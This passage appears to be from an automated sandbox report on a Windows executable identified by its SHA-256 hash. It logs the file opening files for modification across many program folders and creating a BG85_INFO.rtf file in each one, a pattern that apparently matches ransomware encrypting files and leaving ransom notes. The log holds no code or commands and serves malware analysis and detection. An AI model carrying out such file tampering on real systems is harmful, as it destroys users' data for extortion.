Files\Java\jre7\lib\zi\Etc\GMT-3 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\StopFormat.scf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-7 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Malta c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guatemala c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\resources.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lt.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baku c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cocos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoDev.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\nacl_irt_x86_64.nexe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg 